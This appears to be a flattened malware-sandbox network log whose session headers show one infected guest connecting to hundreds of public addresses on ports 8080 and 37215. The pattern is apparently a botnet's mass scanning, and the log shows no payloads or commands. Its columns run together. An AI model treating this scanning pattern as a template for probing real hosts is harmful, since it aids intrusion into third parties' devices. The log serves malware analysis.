                                                        34835192.168.2.234333690.243.57.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34836192.168.2.2334296183.167.189.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34837192.168.2.235823850.176.225.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34838192.168.2.2359660119.103.225.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34839192.168.2.233306623.197.131.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34840192.168.2.235920880.126.118.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34841192.168.2.2333812162.239.47.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34842192.168.2.236076062.177.21.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34843192.168.2.2357368160.123.76.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34844192.168.2.2354214173.192.233.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34845192.168.2.233693045.83.227.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34846192.168.2.2358552209.113.141.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34847192.168.2.235379297.20.88.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34848192.168.2.235272042.110.35.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34849192.168.2.2356336187.138.157.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34850192.168.2.2353064122.192.101.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34851192.168.2.2356852103.197.163.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34852192.168.2.235857867.155.175.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34853192.168.2.2341460206.169.204.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34854192.168.2.234235644.86.127.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34855192.168.2.233358066.97.89.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34856192.168.2.235904620.65.165.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34857192.168.2.234216477.105.50.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34858192.168.2.2334496133.129.10.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34859192.168.2.2347562115.86.8.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34860192.168.2.23559429.83.91.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34861192.168.2.2338962116.194.16.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34862192.168.2.2338024149.44.5.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34863192.168.2.2333014217.153.89.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34864192.168.2.234637870.90.66.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34865192.168.2.233772235.205.108.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34866192.168.2.235597460.86.39.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34867192.168.2.235229264.69.85.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34868192.168.2.234586684.234.242.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34869192.168.2.234930041.11.236.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34870192.168.2.2353554157.165.101.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34871192.168.2.2333652177.170.89.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34872192.168.2.2350700157.60.37.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34873192.168.2.2334050157.207.177.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34874192.168.2.2348892197.15.254.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34875192.168.2.235286241.128.45.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34876192.168.2.2339228210.201.244.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34877192.168.2.235372482.208.142.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34878192.168.2.2351164157.136.214.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34879192.168.2.2345944184.175.196.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34880192.168.2.2351196157.180.149.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34881192.168.2.2339780157.145.128.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34882192.168.2.2350458157.240.107.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34883192.168.2.233828241.93.225.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34884192.168.2.2346502128.55.9.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34885192.168.2.2337566111.150.218.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34886192.168.2.2341658197.20.145.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34887192.168.2.2341404197.186.58.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34888192.168.2.2336698157.101.201.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34889192.168.2.2350038157.171.5.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34890192.168.2.2358496125.183.151.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34891192.168.2.2343410208.134.32.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34892192.168.2.2337118197.28.49.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34893192.168.2.2342948212.16.252.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34894192.168.2.2353772157.207.25.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34895192.168.2.2334932194.146.155.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34896192.168.2.2342230197.244.145.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34897192.168.2.23418664.207.208.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34898192.168.2.2347916157.18.150.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34899192.168.2.2354098199.67.192.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34900192.168.2.2332904157.236.93.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34901192.168.2.2335276192.241.147.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34902192.168.2.2344444157.37.212.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34903192.168.2.235104259.55.132.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34904192.168.2.2336170157.226.152.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34905192.168.2.233703841.217.254.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34906192.168.2.2347828157.163.97.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34907192.168.2.2355038157.210.24.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34908192.168.2.2355672197.82.127.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34909192.168.2.2341698160.217.69.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34910192.168.2.2356050197.39.189.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34911192.168.2.2346116213.168.51.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34912192.168.2.2333190157.223.121.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34913192.168.2.235012041.143.99.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34914192.168.2.234429841.8.36.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34915192.168.2.235536241.145.100.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34916192.168.2.2355782197.72.178.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34917192.168.2.2336938192.33.121.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34918192.168.2.235304258.240.42.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34919192.168.2.235517041.64.208.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34920192.168.2.234960441.236.65.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34921192.168.2.2347988173.254.216.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34922192.168.2.2342664157.12.175.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34923192.168.2.2344720166.206.87.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34924192.168.2.2358330157.163.103.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34925192.168.2.235316896.6.116.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34926192.168.2.235934697.183.96.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34927192.168.2.2342044197.54.58.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34928192.168.2.235955479.101.59.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34929192.168.2.2345108197.81.45.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34930192.168.2.2345822157.59.72.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34931192.168.2.2333676197.83.96.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34932192.168.2.2344828178.88.208.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34933192.168.2.2341596137.13.209.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34934192.168.2.2344080197.195.106.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34935192.168.2.2343148189.241.17.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34936192.168.2.2337230197.131.128.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34937192.168.2.2349604157.28.210.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34938192.168.2.2355400197.209.215.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34939192.168.2.2341748157.182.62.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34940192.168.2.2353754197.82.214.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34941192.168.2.235085441.62.108.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34942192.168.2.2348398197.65.179.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34943192.168.2.234676041.142.41.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34944192.168.2.2354896157.91.73.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34945192.168.2.2356354164.115.17.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34946192.168.2.2334500213.54.9.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34947192.168.2.233941241.87.182.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34948192.168.2.2352494197.1.28.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34949192.168.2.234380641.136.29.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34950192.168.2.2358268157.11.244.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34951192.168.2.2353628134.59.95.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34952192.168.2.233928641.178.37.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34953192.168.2.2338266157.54.168.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34954192.168.2.233477620.214.79.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34955192.168.2.2347940170.108.244.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34956192.168.2.2335444197.147.92.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34957192.168.2.2345938205.221.143.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34958192.168.2.2335802163.97.222.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34959192.168.2.2339634157.170.124.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34960192.168.2.2352304197.82.165.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34961192.168.2.2350852197.57.1.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34962192.168.2.233329841.186.18.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34963192.168.2.2359644157.224.2.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34964192.168.2.235291841.84.232.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34965192.168.2.235701441.172.43.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34966192.168.2.2354602201.142.167.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34967192.168.2.236015241.112.91.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34968192.168.2.2341988157.122.79.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34969192.168.2.2335954157.16.221.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34970192.168.2.2344390157.122.98.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34971192.168.2.235629441.92.162.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34972192.168.2.2349836157.118.232.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34973192.168.2.2351480130.179.22.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34974192.168.2.2339860197.181.204.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34975192.168.2.2347170203.190.29.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34976192.168.2.234615241.0.226.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34977192.168.2.2339050211.131.42.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34978192.168.2.235014841.210.107.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34979192.168.2.2359360157.227.178.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34980192.168.2.234699241.165.61.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34981192.168.2.234502041.158.234.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34982192.168.2.2355862197.158.14.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34983192.168.2.2360758121.64.215.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34984192.168.2.2354358157.132.150.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34985192.168.2.2334504157.61.176.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34986192.168.2.2350772152.118.63.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34987192.168.2.234610041.48.223.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34988192.168.2.2349046157.4.137.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34989192.168.2.2337946157.23.95.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34990192.168.2.234071819.179.212.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34991192.168.2.2357788197.152.104.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34992192.168.2.235891899.41.7.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34993192.168.2.233757041.9.49.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34994192.168.2.2339134201.55.113.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34995192.168.2.2359014197.21.225.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34996192.168.2.2358622192.49.141.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34997192.168.2.234850841.128.67.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34998192.168.2.234902841.15.46.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34999192.168.2.2341226157.85.59.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35000192.168.2.2339298157.195.248.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35001192.168.2.235123441.177.251.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35002192.168.2.23471161.65.216.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35003192.168.2.2344238157.23.226.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35004192.168.2.2357632157.179.245.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35005192.168.2.234608041.155.94.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35006192.168.2.2346948188.146.14.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35007192.168.2.234585441.51.0.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35008192.168.2.2351114197.228.36.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35009192.168.2.235504441.39.55.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35010192.168.2.234919641.232.151.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35011192.168.2.2339602197.165.111.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35012192.168.2.233917641.175.255.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35013192.168.2.2336676116.7.160.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35014192.168.2.2356294197.187.114.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35015192.168.2.2337740124.153.101.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35016192.168.2.2347806157.228.161.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35017192.168.2.2334048157.39.190.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35018192.168.2.2344008150.142.119.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35019192.168.2.2359098197.40.250.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35020192.168.2.233708239.145.48.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35021192.168.2.2339238197.195.59.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35022192.168.2.2347142197.35.41.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35023192.168.2.2360260157.99.217.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35024192.168.2.2346010157.86.74.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35025192.168.2.234878041.148.121.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35026192.168.2.2341800197.141.57.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35027192.168.2.2356696197.228.214.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35028192.168.2.2340594197.187.195.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35029192.168.2.234144641.240.150.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35030192.168.2.2348114141.96.68.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35031192.168.2.235468641.145.240.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35032192.168.2.235142241.229.20.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35033192.168.2.2357544157.164.215.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35034192.168.2.233844683.73.151.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35035192.168.2.2358738157.139.62.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35036192.168.2.2357930191.193.145.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35037192.168.2.2357318202.142.18.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35038192.168.2.235062641.37.100.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35039192.168.2.2347276197.102.68.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35040192.168.2.2335554197.82.78.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35041192.168.2.234938627.4.228.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35042192.168.2.2348450157.149.249.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35043192.168.2.234539041.77.20.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35044192.168.2.233293641.68.23.8437215
